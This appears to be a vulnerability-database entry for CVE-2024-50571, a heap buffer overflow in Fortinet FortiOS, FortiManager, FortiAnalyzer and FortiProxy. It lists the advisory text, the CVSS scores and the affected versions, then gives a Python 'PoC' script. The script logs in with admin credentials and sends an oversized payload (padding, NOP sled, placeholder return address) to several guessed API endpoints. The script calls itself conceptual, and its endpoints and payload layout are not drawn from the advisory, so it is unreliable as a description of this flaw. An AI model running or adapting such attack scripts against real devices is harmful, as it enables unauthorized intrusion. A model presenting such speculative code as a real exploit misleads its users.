Security Vulnerability Report
CVE-2024-50571 CVSS 7.2 HIGH

Published: 2025-10-14 16:15:36
Last Modified: 2026-01-27 20:16:13

Description

A heap-based buffer overflow vulnerability in Fortinet FortiAnalyzer 7.6.0 through 7.6.2, FortiAnalyzer 7.4.0 through 7.4.5, FortiAnalyzer 7.2.0 through 7.2.9, FortiAnalyzer 7.0.0 through 7.0.13, FortiAnalyzer 6.4 all versions, FortiAnalyzer 6.2 all versions, FortiAnalyzer 6.0 all versions, FortiAnalyzer Cloud 7.4.1 through 7.4.5, FortiAnalyzer Cloud 7.2.1 through 7.2.9, FortiAnalyzer Cloud 7.0.1 through 7.0.13, FortiAnalyzer Cloud 6.4 all versions, FortiManager 7.6.0 through 7.6.1, FortiManager 7.4.0 through 7.4.5, FortiManager 7.2.0 through 7.2.9, FortiManager 7.0.0 through 7.0.13, FortiManager 6.4 all versions, FortiManager 6.2 all versions, FortiManager 6.0 all versions, FortiManager Cloud 7.6.2, FortiManager Cloud 7.4.1 through 7.4.5, FortiManager Cloud 7.2.1 through 7.2.9, FortiManager Cloud 7.0.1 through 7.0.13, FortiManager Cloud 6.4 all versions, FortiOS 7.6.0 through 7.6.2, FortiOS 7.4.0 through 7.4.6, FortiOS 7.2.0 through 7.2.10, FortiOS 7.0.0 through 7.0.16, FortiOS 6.4.0 through 6.4.15, FortiOS 6.2 all versions, FortiProxy 7.6.0 through 7.6.1, FortiProxy 7.4.0 through 7.4.7, FortiProxy 7.2.0 through 7.2.12, FortiProxy 7.0.0 through 7.0.19, FortiProxy 2.0 all versions, FortiProxy 1.2 all versions, FortiProxy 1.1 all versions, FortiProxy 1.0 all versions allows an attacker to execute unauthorized code or commands via specifically crafted requests.

CVSS Details

CVSS Score: 7.2
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:fortinet:fortianalyzer:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortianalyzer_cloud:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortimanager:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortimanager_cloud:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:fortinet:fortimanager_cloud:7.6.2:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:fortinet:fortios:*:*:*:*:*:*:*:* - VULNERABLE
FortiAnalyzer 7.6.0 - 7.6.2
FortiAnalyzer 7.4.0 - 7.4.5
FortiAnalyzer 7.2.0 - 7.2.9
FortiAnalyzer 7.0.0 - 7.0.13
FortiAnalyzer 6.4 all versions
FortiAnalyzer 6.2 all versions
FortiAnalyzer 6.0 all versions
FortiAnalyzer Cloud 7.4.1 - 7.4.5
FortiAnalyzer Cloud 7.2.1 - 7.2.9
FortiAnalyzer Cloud 7.0.1 - 7.0.13
FortiAnalyzer Cloud 6.4 all versions
FortiManager 7.6.0 - 7.6.1
FortiManager 7.4.0 - 7.4.5
FortiManager 7.2.0 - 7.2.9
FortiManager 7.0.0 - 7.0.13
FortiManager 6.4 all versions
FortiManager 6.2 all versions
FortiManager 6.0 all versions
FortiManager Cloud 7.6.2
FortiManager Cloud 7.4.1 - 7.4.5
FortiManager Cloud 7.2.1 - 7.2.9
FortiManager Cloud 7.0.1 - 7.0.13
FortiManager Cloud 6.4 all versions
FortiOS 7.6.0 - 7.6.2
FortiOS 7.4.0 - 7.4.6
FortiOS 7.2.0 - 7.2.10
FortiOS 7.0.0 - 7.0.16
FortiOS 6.4.0 - 6.4.15
FortiOS 6.2 all versions
FortiProxy 7.6.0 - 7.6.1
FortiProxy 7.4.0 - 7.4.7
FortiProxy 7.2.0 - 7.2.12
FortiProxy 7.0.0 - 7.0.19
FortiProxy 2.0 all versions
FortiProxy 1.2 all versions
FortiProxy 1.1 all versions
FortiProxy 1.0 all versions

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2024-50571 - Fortinet Heap-based Buffer Overflow PoC
# This is a conceptual PoC demonstrating the exploitation of the heap-based buffer overflow
# vulnerability in Fortinet FortiAnalyzer/FortiManager/FortiOS/FortiProxy products.
#
# Note: Requires valid high-privilege credentials (PR:H)
# The vulnerability is triggered by sending specially crafted requests that cause
# heap buffer overflow in the target system's request processing logic.

import requests
import struct
import sys

TARGET_HOST = "https://target-fortinet-device"
USERNAME = "admin"
PASSWORD = "password"


def authenticate(session, host, username, password):
    """Authenticate to the Fortinet device management interface"""
    login_url = f"{host}/logincheck"
    data = {
        "username": username,
        "secretkey": password
    }
    resp = session.post(login_url, data=data, verify=False)
    return "CSRF_TOKEN" in session.cookies.get_dict() or resp.status_code == 200


def trigger_overflow(session, host, endpoint, payload):
    """
    Trigger heap-based buffer overflow by sending oversized payload
    to a vulnerable endpoint that processes user-supplied data
    without proper bounds checking.
    """
    url = f"{host}{endpoint}"
    headers = {
        "Content-Type": "application/x-www-form-urlencoded",
        "X-Requested-With": "XMLHttpRequest"
    }
    # Send oversized data to trigger heap buffer overflow
    resp = session.post(url, data=payload, headers=headers, verify=False)
    return resp


def build_overflow_payload(overflow_size=4096):
    """
    Build a payload that causes heap buffer overflow.
    The overflow data is designed to overwrite adjacent heap structures
    and potentially redirect execution flow.
    """
    # NOP sled + shellcode placeholder
    nop_sled = b"\x90" * 256
    # Return address overwrite (example - actual address needs ASLR bypass)
    ret_addr = struct.pack("<I", 0x41414141)
    # Padding to overflow the heap buffer
    padding = b"A" * overflow_size
    payload = padding + nop_sled + ret_addr
    return payload


def main():
    session = requests.Session()
    print(f"[*] Targeting {TARGET_HOST}")

    # Step 1: Authenticate with high-privilege credentials
    print("[*] Authenticating...")
    if not authenticate(session, TARGET_HOST, USERNAME, PASSWORD):
        print("[-] Authentication failed. High-privilege credentials required.")
        sys.exit(1)
    print("[+] Authentication successful")

    # Step 2: Build overflow payload
    print("[*] Building overflow payload...")
    payload = build_overflow_payload()

    # Step 3: Send crafted request to vulnerable endpoint
    # The exact endpoint varies by product (FortiAnalyzer/FortiManager/FortiOS/FortiProxy)
    vulnerable_endpoints = [
        "/api/v2/monitor/system/config/backup",
        "/api/v2/cmdb/system/admin",
        "/jsonrpc"
    ]
    for endpoint in vulnerable_endpoints:
        print(f"[*] Attempting overflow via {endpoint}")
        try:
            resp = trigger_overflow(session, TARGET_HOST, endpoint, payload)
            print(f"[*] Response status: {resp.status_code}")
        except Exception as e:
            print(f"[*] Connection error (possible crash): {e}")


if __name__ == "__main__":
    main()
